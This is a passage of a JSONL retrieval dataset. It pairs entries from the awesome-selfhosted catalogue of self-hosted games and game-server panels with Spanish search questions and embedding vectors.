Room β€” Minimalist text adventure game for your browser [MPL-2.0, Javascript]. DDraceNetwork β€” Cooperative platformer version of DDRace, a Teeworlds modification featuring unique cooperative gameplay [Zlib, C++]. Digibuzzer β€” Create a virtual game room around a connected buzzer (documentation in French) [AGPL-3.0, Nodejs]. Hypersomnia β€” Competitive top-down shooter blending Counter-Strike with Hotline Miami. Runs on Linux, Windows, MacOS and the Web [AGPL-3.0, C++/Docker]. Lila β€” Ad-less chess server powering lichess.org, with official iOS and Android client apps [AGPL-3.0, Scala]. Luanti β€” Voxel game engine (formerly Minetest). Play one of our many games, mod a game to your liking, make your own game, or play on a multiplayer server [LGPL-2.1/MIT/Zlib, C++/Lua/deb]. Mindustry β€” Factorio-like tower defense game. Build production chains to gather more resources, and build complex facilities [GPL-3.0, Java].", "indexar": "cual es una alternativa libre a Factorio o Mindustry para construir fΓ‘bricas", "v": [0.03706, 0.03199, -0.025, -0.08747, -0.08788, 0.01182, -0.0458, 0.0325, -0.23497, -0.0673, 0.07273, -0.00195, -0.01376, 0.04485, -0.00288, 0.04619, 0.00365, -0.20064, -0.10602, -0.02991, -0.04047, -0.02263, -0.01967, -0.06625, 0.00457, -0.03866, -0.00881, -0.04516, -0.12554, 0.12791, 0.14951, 0.10592, 0.21425, -0.06266, 0.02179, -0.0497, 0.03383, 0.12905, 0.05602, -0.03351, -0.05184, 0.10576, -0.0759, 0.03629, -0.02605, -0.05705, -0.00598, -0.08774, -0.00828, 0.14223, 0.05078, -0.01891, -0.05866, 0.06018, 0.1432, -0.02161, -0.02565, -0.10357, -0.07396, 0.06947, -0.06336, 0.07826, 0.08825, -0.11342, -0.083, 0.03221, -0.04096, 0.05241, 0.02875, 0.01449, -0.12939, -0.13368, -0.09111, -0.02022, 0.02032, 0.04262, 0.01483, -0.04229, -0.00212, 0.01527, -0.00566, -0.04943, 0.02653, -0.07202, 0.11072, -0.05902, -0.03637, 0.00264, -0.14812, -0.06778, -0.13589, -0.01516, -0.06943, 0.08952, -0.03335, -0.04651, 0.13129, 0.08997, -0.02266, 0.08301, -0.00212, 0.00085, -0.01926, -0.00634, -0.00338, 0.02988, -0.08846, 0.02403, -0.05777, 0.03993, 0.00273, 0.0693, -0.06182, -0.02139, 0.06235, -0.04067, -0.03631, -0.00077, -0.0976, -0.04761, 0.03266, 0.04215, 0.0049, -0.08231, -0.11668, -0.03992, -0.00358, 0.05096, -0.02867, -0.04401, 0.0289, -0.01925, -0.0063, -0.11202, -0.03897, -0.02055, 0.09638, -0.03353, 0.1212, -0.03875, 0.03458, 0.06199, 0.06789, -0.07094, -0.07069, -0.044, -0.03417, -0.01995, -0.05676, 0.02427, -0.0276, 0.03201, 0.05225, 0.01914, -0.03835, 0.0151, 0.04086, -0.06125, 0.05752, 0.15281, 0.0401, -0.0005, -0.0501, 0.00712, 0.03449, 0.03429, 0.00518, 0.00806, -0.04048, 0.05399, 0.01541, 0.00975, 0.11641, 0.04841, -0.00448, -0.05339, 0.00981, -0.16074, -0.02672, -0.08961, -0.03615, 0.07937, -0.08958, 0.01914, -0.03553, -0.00135, 0.03817, 0.01372, 0.08911, 0.05142, -0.00426, 0.03906, 0.01328, -0.03368, 0.00079, -0.00473, 0.09875, -0.03485, 0.02689, -0.02766, -0.08374, 0.00356, -0.04885, -0.05511, 0.01257, 0.04399, -0.07638, -0.01853, -0.03004, 0.03771, 0.04084, -0.02243, 0.03268, 0.02034, -0.02942, -0.0012, 0.03218, -0.02973, -0.01477, -0.03934, -0.00357, 0.01219, 0.05826, -0.02099, -0.05799, 0.02255, 0.0655, 0.02607, -0.0413, 0.02128, -0.06214, 0.03231, -0.02773, -0.01349, 0.06121, 0.03627, -0.04656, 0.03517, 0.03309, -0.0031, 0.10591, 0.08436, -0.00347, -0.01366, -0.04742, -0.03437, -0.06668, -0.01095, 0.02045, -0.03667, -0.05356, 0.06525, 0.01007, -0.00774, -0.00219, -0.02748]} +{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: MTA:SA β€” Add network play functionality to Rockstar North's Grand Theft Auto game series, in which this functionality is not originally found [⚠, GPL-3.0, C++]. OpenTTD β€” Transport tycoon simulation game [GPL-2.0, C++/Docker]. piqueserver β€” Server for openspades, the first-person shooter in a destructible voxel world [GPL-3.0, Python/C++]. Posio β€” Geography multiplayer game [MIT, Python]. Razzia β€” Quiz game platform, designed for smaller self-hosted events (alternative to Kahoot!) [MIT, Nodejs/Docker]. Red Eclipse 2 β€” Arena first-person shooter similar to Unreal Tournament [Zlib/MIT/CC-BY-SA-4.0, C/C++/deb]. Scribble.rs β€” A web-based pictionary game [BSD-3-Clause, Go/Docker]. Suroi β€” An open-source 2D battle royale game inspired by surviv.io [GPL-3.0, Nodejs]. The Battle for Wesnoth β€” The Battle for Wesnoth is an Open Source, turn-based tactical strategy game with a high fantasy theme, featuring both singleplayer and online/hotseat multiplayer combat [GPL-2.0, C++/deb].", "indexar": "que programa hay para montar un servidor de GTA con jugadores en red", "v": [-0.0418, -0.03758, -0.04717, -0.20164, -0.1743, -0.06264, 0.05331, -0.0126, 0.05162, -0.02053, -0.03055, -0.05479, 0.04975, 0.01349, 0.09124, 0.1143, 0.0697, -0.0107, 0.1243, -0.00928, 0.00806, 0.00622, 0.16694, -0.17654, 0.03617, 0.08456, 0.04867, -0.04641, -0.0544, 0.11909, 0.03946, -0.06648, -0.04057, -0.07226, 0.0265, -0.13634, 0.03023, -0.03863, 0.04214, 0.06001, 0.03149, 0.01865, -0.11204, -0.05676, 0.17261, 0.01148, 0.12567, -0.08949, -0.0402, -0.08981, 0.08715, 0.01881, -0.00333, -0.19524, 0.02018, -0.06783, 0.01491, -0.19158, -0.03387, 0.00446, -0.04987, 0.0586, -0.02357, 0.05915, -0.01921, 0.07898, -0.0151, -0.02768, -0.06456, 0.02721, -0.08663, 0.00295, -0.01278, -0.04307, 0.00559, 0.02907, -0.01852, -0.08761, 0.08505, 0.00314, 0.05643, 0.03265, -0.04691, 0.14006, -0.08604, -0.04632, 0.05103, -0.09275, 0.00413, 0.02289, 0.03015, 0.01468, -0.05296, 0.09651, 0.00172, -0.15988, 0.2129, 0.00607, 0.06446, -0.01557, -0.03788, 0.03342, 0.00813, 0.10991, -0.08766, 0.06947, 0.11067, -0.10815, 0.03824, 0.01056, 0.14081, -0.00894, -0.06273, 0.08748, 0.02068, -0.09693, -0.00264, 0.03214, 0.04827, 0.05305, -0.08574, 0.04796, 0.00431, 0.05031, 0.05853, -0.03967, -0.08398, 0.0099, -0.04434, 0.01803, -0.01929, -0.05674, -0.06623, -0.00282, -0.16668, 0.04532, 0.00333, -0.0086, -0.07039, 0.03453, -0.01585, 0.01682, -0.01103, -0.00958, 0.12392, 0.04504, 0.10473, -0.11421, -0.02858, 0.02795, 0.06215, 0.05654, -0.07574, -0.0487, -0.03735, 0.04413, 0.08026, 0.03146, -0.04339, 0.03575, 0.02592, 0.02779, -0.00521, -0.00887, 0.03307, -0.03342, 0.03899, 0.05872, 0.09785, 0.03115, -0.00834, 0.00035, 0.00289, -0.05862, 0.01625, 0.03732, -0.01782, -0.05772, -0.02717, -0.02637, 0.00451, -0.06369, 0.04787, 0.04537, -0.08704, -0.10024, -0.01484, 0.00589, -0.00648, -0.03503, -0.02424, 0.05124, -0.05062, 0.06454, 0.07371, 0.0146, 0.02884, -0.02834, 0.01114, -0.02515, -0.01408, -0.02616, 0.01931, -0.01886, 0.01582, 0.04085, -0.03461, 0.02173, -0.003, 0.0682, 0.01393, -0.01699, 0.07055, -0.00226, 0.04781, -0.03248, 0.03217, -0.02453, 0.02391, 0.00043, 0.01592, -0.00061, 0.07416, -0.0205, -0.03023, -0.01334, -0.00022, 0.03146, 0.02427, -0.0353, 0.00666, -0.02317, -0.02552, -0.02074, -0.03997, 0.01853, 0.04118, 0.01554, -0.0239, -0.05184, 0.03163, 0.02811, -0.00208, -0.05054, 0.01361, -0.08095, 0.01344, -0.04029, 0.00049, 0.00553, -0.05257, -0.01519, 0.00642, -0.08613, -0.00693, 0.00737]} +{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: MTA:SA β€” Add network play functionality to Rockstar North's Grand Theft Auto game series, in which this functionality is not originally found [⚠, GPL-3.0, C++]. OpenTTD β€” Transport tycoon simulation game [GPL-2.0, C++/Docker]. piqueserver β€” Server for openspades, the first-person shooter in a destructible voxel world [GPL-3.0, Python/C++]. Posio β€” Geography multiplayer game [MIT, Python]. Razzia β€” Quiz game platform, designed for smaller self-hosted events (alternative to Kahoot!) [MIT, Nodejs/Docker]. Red Eclipse 2 β€” Arena first-person shooter similar to Unreal Tournament [Zlib/MIT/CC-BY-SA-4.0, C/C++/deb]. Scribble.rs β€” A web-based pictionary game [BSD-3-Clause, Go/Docker]. Suroi β€” An open-source 2D battle royale game inspired by surviv.io [GPL-3.0, Nodejs]. The Battle for Wesnoth β€” The Battle for Wesnoth is an Open Source, turn-based tactical strategy game with a high fantasy theme, featuring both singleplayer and online/hotseat multiplayer combat [GPL-2.0, C++/deb].", "indexar": "cual es una alternativa libre a Kahoot que sirva para eventos pequeΓ±os", "v": [-0.11572, 0.03342, -0.05967, 0.03851, -0.11466, -0.15232, -0.0709, 0.0076, -0.10103, -0.12294, -0.12563, -0.20944, 0.00958, 0.00706, 0.11921, -0.02546, 0.16554, -0.04224, 0.22324, -0.00769, -0.13145, 0.01573, -0.00564, -0.07433, 0.01285, -0.08319, 0.12005, 0.17837, -0.07949, 0.04202, 0.02219, 0.06109, 0.10399, -0.00455, 0.00502, 0.04658, 0.15106, 0.04512, 0.01878, -0.11423, 0.01241, -0.06082, 0.01728, 0.03926, -0.05889, -0.0661, -0.1649, 0.0949, -0.01698, 0.06273, -0.01466, 0.07429, -0.04224, 0.01444, 0.06406, -0.05493, 0.00688, -0.20749, -0.05892, -0.00758, -0.0984, 0.02945, -0.00634, -0.02157, 0.06554, 0.06223, -0.06005, 0.0289, 0.00429, 0.05045, -0.00856, -0.04841, 0.0722, -0.05298, -0.09004, 0.11845, -0.0782, -0.00863, -0.07484, 0.09064, -0.03496, 0.00698, 0.0809, -0.00114, -0.03656, -0.00503, 0.0505, -0.07375, 0.07582, 0.06727, 0.0327, 0.06053, 0.10412, -0.00175, -0.06578, -0.06963, 0.08384, 0.0601, -0.02042, 0.05194, 0.01953, 0.03966, -0.11792, -0.04843, -0.0039, -0.03657, 0.02601, 0.05917, -0.03785, -0.04016, -0.01435, 0.08556, 0.02758, 0.02882, -0.00455, 0.02103, 0.0133, -0.0315, 0.03881, 0.01487, -0.07858, -0.04579, -0.00904, -0.04906, 0.04966, 0.0514, 0.06862, 0.05524, -0.04211, 0.08287, 0.14343, -0.05467, -0.06663, -0.01318, -0.04856, -0.03347, 0.07738, -0.02316, 0.04256, 0.04318, 0.03215, -0.00919, 0.01792, -0.0335, 0.05325, -0.04826, 0.01979, 0.02601, 0.05561, 0.05249, -0.04673, 0.01894, -0.02435, 0.12403, -0.07211, -0.04292, -0.09628, -0.00463, 0.02886, 0.07488, -0.01552, -0.01716, 0.05277, -0.01236, 0.04242, -0.04795, -0.00306, -0.00912, -0.0461, 0.01052, -0.02663, 0.07313, 0.03154, -0.03576, 0.06108, -0.04911, -0.04894, -0.06874, 0.03635, -0.07758, 0.05196, 0.06001, -0.08304, 0.09664, 0.01799, -0.04886, 0.07767, 0.00338, 0.06085, 0.02664, -0.02619, 0.03101, -0.0202, -0.11683, -0.07096, 0.04252, 0.03551, -0.11846, 0.01365, 0.03429, 0.02705, 0.03569, 0.00098, -0.03076, -0.0147, -0.03442, -0.03829, 0.05024, -0.00471, 0.07653, 0.00524, 0.05131, 0.0484, -0.00801, -0.03855, 0.04031, -0.00149, -0.02736, 0.04087, -0.00627, 0.04733, -0.03483, 0.02906, 0.02721, -0.06513, -0.00337, 0.04582, -0.04904, 0.04616, -0.00096, -0.00368, 0.00848, -0.03782, 0.05052, -0.00634, -0.03825, 0.03461, 0.04751, -0.00033, -0.02818, 0.0612, 0.04557, 0.0184, -0.02437, -0.01216, -0.00828, -0.10689, -0.02646, -0.05856, -0.03693, 0.00499, 0.00738, 0.0238, 0.02127, 0.0312, -0.01262]} +{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: MTA:SA β€” Add network play functionality to Rockstar North's Grand Theft Auto game series, in which this functionality is not originally found [⚠, GPL-3.0, C++]. OpenTTD β€” Transport tycoon simulation game [GPL-2.0, C++/Docker]. piqueserver β€” Server for openspades, the first-person shooter in a destructible voxel world [GPL-3.0, Python/C++]. Posio β€” Geography multiplayer game [MIT, Python]. Razzia β€” Quiz game platform, designed for smaller self-hosted events (alternative to Kahoot!) [MIT, Nodejs/Docker]. Red Eclipse 2 β€” Arena first-person shooter similar to Unreal Tournament [Zlib/MIT/CC-BY-SA-4.0, C/C++/deb]. Scribble.rs β€” A web-based pictionary game [BSD-3-Clause, Go/Docker]. Suroi β€” An open-source 2D battle royale game inspired by surviv.io [GPL-3.0, Nodejs]. The Battle for Wesnoth β€” The Battle for Wesnoth is an Open Source, turn-based tactical strategy game with a high fantasy theme, featuring both singleplayer and online/hotseat multiplayer combat [GPL-2.0, C++/deb].", "indexar": "con que puedo montar un juego de guerra por turnos con temΓ‘tica fantasy", "v": [-0.06525, 0.04128, -0.06696, -0.08648, -0.13701, 0.0706, -0.04637, 0.08096, 0.05504, -0.03988, 0.00335, 0.01496, 0.12867, 0.10136, 0.00031, 0.02526, 0.12056, -0.00626, 0.12258, 0.01279, -0.04051, -0.15271, -0.03017, -0.12937, -0.07484, -0.04339, 0.02145, -0.02902, -0.09385, -0.00625, -0.00199, 0.00362, 0.23787, 6e-05, -0.01531, -0.12087, 0.08463, 0.09344, 0.07612, 0.06276, -0.03588, -0.05713, -0.06051, -0.01803, 0.01789, -0.06699, 0.08009, 0.02009, 0.03139, -0.06064, 0.1413, 0.05573, 0.00307, -0.1086, 0.04461, -0.14225, 0.08737, 0.03199, 0.0218, -0.01624, -0.15683, 0.04623, -0.02237, -0.04579, 0.05675, -0.04721, -0.06536, 0.05758, 0.01169, 0.08046, -0.0696, -0.00903, -0.11179, -0.05206, -0.05448, -0.00209, 0.00353, -0.04079, 0.06929, 0.02602, -0.01644, -0.08723, -0.01505, 0.02278, -0.10601, -0.07446, 0.04159, -0.0827, 0.04108, -0.00644, 0.04945, -0.04414, -0.0669, 0.03293, 0.00703, -0.1151, -0.02922, 0.02075, 0.00949, 0.0985, -0.04072, -0.02029, -0.03936, 0.10975, 0.03738, -0.02166, 0.06709, -0.0744, 0.07878, -0.03063, -0.06612, 0.08566, -0.03832, 0.03367, -0.01807, -0.10844, -0.02451, 0.0674, 0.12761, 0.03299, -0.09835, 0.09693, 0.11945, 0.07644, 0.00885, 0.02095, 0.01246, -0.04047, -0.05563, -0.07524, 0.01133, -0.03648, -0.03643, 0.01774, -0.02867, -0.05997, 0.05594, 0.08717, -0.05105, 0.05065, 0.02977, 0.06901, 0.06654, -0.07022, 0.03936, 0.04767, 0.04659, -0.13582, 0.04917, 0.04223, 0.00288, 0.08438, 0.11483, 0.10525, -0.01081, 0.08671, 0.08269, 0.05697, 0.01972, 0.0631, 0.02218, 0.04179, -0.02471, -0.06834, -0.01746, -0.0139, -0.03318, -0.04882, -0.02086, 0.00505, -0.05363, -0.034, -0.01493, 0.01428, -0.03577, 0.01411, -0.10281, 0.01652, -0.05994, -0.08061, -0.0122, -0.04746, 0.01233, 0.08671, -0.0872, -0.13653, 0.01832, -0.06846, 0.05261, 0.0268, -0.02234, 0.00838, 0.06333, 0.0491, -0.01844, -0.05109, 0.0021, 0.00322, -0.0117, -0.08371, 0.05563, -0.04599, 0.04242, -0.02076, -0.0136, -0.00181, -0.01906, 0.11514, -0.008, -0.00342, 0.07793, -0.09116, 0.03416, -0.00799, 0.08415, 0.02335, 0.03933, -0.10863, 0.00285, -0.01493, -0.00067, 0.01156, 0.02323, -0.05704, -0.00625, 0.02173, 0.04101, -0.03761, 0.00516, -0.02402, -0.0506, 0.04716, -0.04581, 0.05863, -0.05228, 0.0915, 0.05158, -0.04567, -0.03182, 0.02844, 0.02893, -0.01315, 0.01532, -0.06063, -0.02326, -0.09804, -0.03, -0.0233, -0.00828, -0.04192, -0.08598, -0.07165, -0.05651, -0.02664, -0.03485, 0.06469]} +{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: Veloren β€” Multiplayer RPG. Open-source game inspired by Cube World, Legend of Zelda, Dwarf Fortress and Minecraft [GPL-3.0, Rust]. Zero-K β€” Open Source on Springrts engine. Zero-K is a traditional real time strategy game with a focus on player creativity through terrain manipulation, physics, and a large roster of unique units - all while being balanced to support competitive play [GPL-2.0, Lua].", "indexar": "quΓ© programa es un juego de estrategia en tiempo real abierto para que pueda jugar online", "v": [-0.15546, 0.09822, -0.10083, -0.10648, -0.03968, -0.10903, -0.01961, -0.04186, 0.00844, -0.12395, 0.06349, -0.05504, -0.0201, -0.00868, 0.02791, 0.00992, 0.11824, 0.07134, 0.05971, -0.03085, -0.04887, -0.05593, -0.05026, -0.12216, 0.03134, 0.01009, 0.06254, 0.03476, -0.07615, 0.0389, -0.09135, 0.0523, 0.18281, -0.13955, 0.0692, -0.05651, 0.11181, 0.06711, 0.07361, 0.00865, 0.01681, 0.04725, -0.07129, -0.06753, 0.10646, 0.05455, 0.09844, -0.0503, -0.03294, -0.03419, 0.04946, -0.01456, 0.04358, -0.13569, 0.11985, -0.06803, 0.00879, -0.11502, -0.04253, -0.09515, -0.1132, -0.072, 0.05442, -0.09132, 0.0183, 0.01767, 0.01591, 0.10273, -0.02597, 0.08292, -0.03433, 0.01876, -0.00119, 0.03716, -0.08454, 0.03228, 0.00687, -0.02491, -0.00778, -0.045, 0.05884, -0.11428, -0.02731, 0.13537, -0.0354, -0.01405, 0.06769, -0.01433, -0.00721, -0.03988, 0.00685, -0.00634, -0.08608, 0.06678, -0.01667, -0.16698, 0.06355, -0.08473, 0.05291, 0.03301, -0.03094, -0.01497, -0.15884, 0.04524, -0.10499, 0.02124, 0.02865, -0.0529, -0.08803, 0.01208, -0.04053, -0.00245, -0.10394, 0.06428, 0.09784, 0.05231, -0.02312, 0.03101, 0.08716, 0.02646, -0.13387, 0.04739, 0.06009, 3e-05, 0.00987, -0.02094, -0.0983, -0.02181, -0.06347, -0.05008, -0.05316, 0.017, -0.07217, 0.03967, -0.07105, -0.05135, 0.00394, 0.04847, -0.0511, 0.01969, -0.02222, 0.06055, -0.0006, -0.06066, 0.04514, -0.01308, 0.08887, -0.07314, -0.05067, 0.00242, 0.06391, 0.08582, 0.02987, 0.01386, 0.02249, 0.06575, -0.00523, 0.05656, -0.13891, 0.05808, 0.00093, 0.0177, -0.05928, -0.05444, 0.06557, -0.03974, 0.04781, 0.01986, 0.05252, -0.01946, -0.04915, 0.01913, 0.07794, -0.12374, -0.07807, 0.04298, -0.06271, -0.00217, -0.0695, -0.09827, -0.00532, -0.0489, 0.06869, 0.048, -0.08845, -0.08579, 0.02827, -0.02806, 0.00801, 0.01548, -0.02582, -0.02059, -0.06673, 0.13451, 0.0153, -0.03717, 0.08044, 0.02493, -0.00172, -0.04172, 0.00152, -0.03262, 0.03928, -0.01079, -0.06525, 0.11042, 0.05459, 0.00994, -0.04643, 0.09124, 0.04663, -0.05746, 0.03787, 0.01691, 0.07391, -0.03467, 0.01092, -0.0409, 0.05479, 0.01754, -0.02247, -0.0052, 0.03483, -0.0447, -0.03484, -0.05165, 0.03236, 0.04968, -0.00534, -0.05134, 0.00233, -0.04156, 0.00417, 0.04932, -0.00529, -0.01866, 0.07537, -0.02392, -0.05291, -0.02109, 0.00837, -0.03739, -0.00482, -0.04133, 0.00732, -0.0921, -0.03858, -0.08256, -0.03215, -0.06309, -0.13286, -0.03883, -0.00994, -0.01623, 0.00079, 0.07632]} +{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: Veloren β€” Multiplayer RPG. Open-source game inspired by Cube World, Legend of Zelda, Dwarf Fortress and Minecraft [GPL-3.0, Rust]. Zero-K β€” Open Source on Springrts engine. Zero-K is a traditional real time strategy game with a focus on player creativity through terrain manipulation, physics, and a large roster of unique units - all while being balanced to support competitive play [GPL-2.0, Lua].", "indexar": "con quΓ© puedo montar una partida multijugador sin pagar licencias", "v": [0.03937, 0.05068, -0.1433, -0.06115, -0.13454, -0.05311, 0.04112, -0.01768, -0.25727, -0.15251, 0.06999, -0.08701, 0.13505, -0.04297, 0.06395, 0.10384, 0.02282, -0.04116, 0.06887, -0.0407, 0.055, 0.0083, 0.06978, -0.1603, 0.00474, 0.04502, 0.16113, -0.11737, -0.20332, 0.10594, -0.03543, 0.10974, 0.10277, -0.04433, 0.10934, -0.06516, 0.02857, 0.10857, 0.10908, -0.03762, -0.0106, 0.03207, -0.00478, -0.10864, -0.08549, -0.11063, -0.001, 0.03377, 0.02819, -0.04131, 0.08226, 0.02416, -0.06968, -0.09386, 0.02796, -0.05795, 0.07563, -0.03371, 0.07012, -0.00039, -0.0291, 0.07802, -0.00216, 0.03719, -0.03328, 0.07413, 0.02572, 0.10532, 0.05934, -0.02438, -0.13832, -0.04037, -0.01412, 0.00576, -0.09738, 0.04318, -0.02577, -0.10201, 0.0927, 0.10925, 0.10778, -0.02161, -0.02489, -0.00402, -0.00256, -0.02406, 0.01994, -0.12991, 0.05792, -0.01547, 0.01065, 0.05036, -0.00365, 0.06077, 0.01376, -0.10661, 0.09501, 0.07256, -0.06217, 0.01184, -0.06812, 0.11101, -0.0191, 0.01687, -0.01543, 0.02959, 0.09992, -0.13191, -0.05374, 0.00835, 0.03115, 0.09501, -0.11418, 0.04264, -0.07706, -0.01577, -0.05913, 0.06404, 0.01894, 0.0847, 0.00744, 0.01143, 0.08827, -0.01805, 0.06526, -0.06958, 0.02379, 0.20474, -0.11176, -0.02364, -0.01677, -0.02938, 0.00294, 0.013, -0.00895, 0.04106, -0.02017, -0.034, -0.10922, 0.04284, 0.07354, 0.0542, 0.03355, 0.0087, 0.00816, 0.06437, -0.02224, -0.11737, -0.07893, -0.02798, 0.0537, 0.0071, 0.00586, 0.03511, -0.08064, 0.0355, 0.05915, -0.02466, 0.04281, 0.04966, 0.02395, 0.08826, -0.05486, -0.01195, 0.03718, -0.01409, -0.06236, -0.01891, 0.01405, 0.01828, -0.03438, -0.02112, 0.0217, -0.00214, 0.07985, -0.02896, -0.01854, -0.03248, -0.04003, -0.02013, -0.06143, 0.02226, -0.0534, -0.03028, 0.00171, 0.04535, -0.03282, 0.0256, 0.03612, 0.02401, -0.01754, 0.01498, -0.01196, -0.04634, 0.03404, -0.02862, -0.00057, 0.00583, -0.04178, -0.00943, 0.01851, 0.03558, -0.03707, 0.02507, 0.05708, -0.04648, 0.008, 0.10664, 0.02641, 0.00771, -0.01673, -0.03291, 0.04377, -0.03349, -0.03013, 0.01869, -0.02042, -0.03523, -0.03772, 0.04018, 0.09123, 0.00645, 0.00197, -0.00547, 0.05491, -0.00778, 0.01123, 0.02932, 0.03825, 0.01174, -0.02354, 0.04044, -0.06047, 0.00965, 0.03427, 0.00953, 0.01944, 0.00979, -0.03242, 0.01597, 0.00569, 0.03379, 0.03465, -0.05367, -0.04819, -0.02364, -0.03746, -0.05195, 0.01828, 0.00229, 0.00911, 0.09203, 0.00723, -0.00126, 0.00607, -0.01473]} +{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: Veloren β€” Multiplayer RPG. Open-source game inspired by Cube World, Legend of Zelda, Dwarf Fortress and Minecraft [GPL-3.0, Rust]. Zero-K β€” Open Source on Springrts engine. Zero-K is a traditional real time strategy game with a focus on player creativity through terrain manipulation, physics, and a large roster of unique units - all while being balanced to support competitive play [GPL-2.0, Lua].", "indexar": "cuΓ‘l es una alternativa gratuita a juegos como Warcraft o Civilization", "v": [-0.1365, -0.05036, 0.05041, -0.06552, -0.02608, -0.0348, -0.0266, 0.06346, -0.01029, -0.10724, -0.00047, -0.1486, -0.05028, 0.09164, 0.08005, -0.04871, 0.11789, -0.02196, 0.0115, 0.03577, -0.09754, -0.10157, 0.023, -0.0998, -0.11605, -0.00651, -0.00103, -0.02299, -0.10525, 0.11613, -0.00508, 0.03757, 0.22036, 0.01769, 0.00853, -0.06139, 0.1017, 0.04009, 0.06093, -0.00932, -0.05702, -0.03898, -0.0561, 0.05175, -0.00093, -0.05273, -0.03245, -0.00577, -0.02016, -0.01813, 0.00132, -0.05083, -0.11751, -0.01661, 0.05896, -0.04448, 0.04897, -0.15318, -0.0496, -0.11213, -0.10769, 0.12016, 0.04921, -0.02164, 0.11433, 0.01261, -0.2171, 0.04633, -0.03475, 0.08129, 0.03723, 0.0288, 0.01045, -0.10488, -0.04431, -4e-05, -0.0956, -0.06198, 0.05402, 0.01619, 0.05409, -0.09841, -0.06063, 0.01979, 0.00072, 0.01905, -0.0318, -0.13505, -0.00403, -0.04115, 0.10796, 0.02908, -0.07064, 0.19546, -0.05225, -0.14769, 0.04277, -0.03001, -0.02751, 0.13144, 0.01789, -0.03162, -0.04508, -0.02925, -0.0688, 0.0169, 0.05136, 0.02228, -0.04551, -0.09645, 0.02498, 0.0971, -0.05829, 0.08691, -0.00914, 0.00129, 0.00137, 0.04828, 0.1717, 0.05151, -0.06384, 0.06868, 0.0267, -0.05907, -0.03376, 0.03509, -0.00021, -0.00478, -0.01156, -0.00475, 0.05751, -0.05173, -0.05991, -0.01202, -0.13799, -0.10418, 0.05447, -0.04912, -0.03115, 0.00059, 0.06268, 0.01822, 0.0073, -0.01192, 0.02855, -0.02281, 0.07909, -0.10992, 0.02461, -0.03416, -0.00249, -0.00374, -0.00355, 0.10339, -0.02449, 0.08769, 0.01953, 0.03037, -0.06948, 0.07502, 0.03008, -0.04573, -0.02372, -0.0029, 0.01444, -0.03861, 0.01469, 0.0244, -0.0951, -0.0244, -0.01751, 0.01355, -0.02935, -0.01056, 0.01734, 0.02729, 0.00782, -0.01026, -0.05304, -0.11325, -0.04935, 0.03173, -0.03573, -0.05334, -0.05345, -0.15976, -0.02588, -0.02563, 0.08722, 0.04663, -0.05687, -0.01917, -0.04235, -0.00227, -0.03838, -0.04013, 0.08188, -0.1021, -0.03734, -0.02271, -0.03949, -0.06449, -0.08262, -0.05522, -0.01317, -0.03715, 0.033, 0.02149, -0.02474, 0.01538, -0.01149, 0.0133, 0.07174, -0.01595, 0.12953, -0.00626, 0.00864, -0.0208, 0.01016, -0.05618, -0.01627, -0.0083, 0.03668, -0.04546, 0.01668, 0.01507, 0.02563, 0.09804, -0.03122, 0.01362, 0.0303, 0.01007, 0.01959, 0.05155, -0.00021, 0.03352, 0.02606, 0.01314, -0.05449, 0.03566, 0.07555, -0.00357, -0.00532, -0.00922, -0.09289, -0.07434, -0.033, -0.01698, -0.01508, -0.03065, -0.01792, 0.00521, 0.0334, 0.02372, -0.07, 0.04597]} +{"tipo": "pregunta", "herramienta": "Games - Administrative Utilities & Control Panels", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games - Administrative Utilities & Control Panels", "tema": "games - administrative utilities & control panels", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games - Administrative Utilities & Control Panels: auto-mcs β€” Cross-platform Minecraft server manager [AGPL-3.0, Python]. Calagopus β€” Modern game server management panel. Deploy, monitor, and manage Minecraft, Hytale, and other game servers with industry-leading performance [MIT, Rust/Docker/deb]. Crafty Controller β€” Minecraft launcher and manager that allows users to start and administer Minecraft servers from a user-friendly interface [GPL-3.0, Docker/Python]. Drop β€” Game distribution platform, designed for distributing and sharing DRM-free games efficiently (alternative to Steam, GameVault) [AGPL-3.0, Docker]. EasyWI β€” Easy-Wi is a Web-interface that allows you to manage server daemons like gameservers. In addition it provides you with a CMS which includes a fully automated game- and voiceserver lending service [GPL-3.0, PHP/Shell]. GameAP β€” Game Administration Panel for managing game servers on Linux and Windows [MIT, Go/Docker].", "indexar": "que programa sirve para administrar un servidor de Minecraft en varias plataformas?", "v": [0.08921, 0.04091, -0.10342, -0.20683, -0.02766, -0.05296, -0.08734, -0.03903, -0.08347, -0.1542, 0.06017, -0.01723, 0.18223, -0.10726, 0.04328, 0.0272, 0.13913, -0.16299, 0.08599, 0.09789, 0.04482, 0.05155, 0.05979, -0.04846, -0.06782, 0.01857, 0.07531, -0.04344, -0.13414, -0.05837, 0.00725, 0.02863, 0.05579, -0.05204, 0.03911, -0.15621, 0.04218, 0.0266, -0.06161, 0.03409, 0.00083, 0.05161, -0.02387, -0.04737, 0.04296, -0.05013, 0.09832, -0.0796, 0.05447, 0.00598, -0.0218, -0.07372, -0.15728, 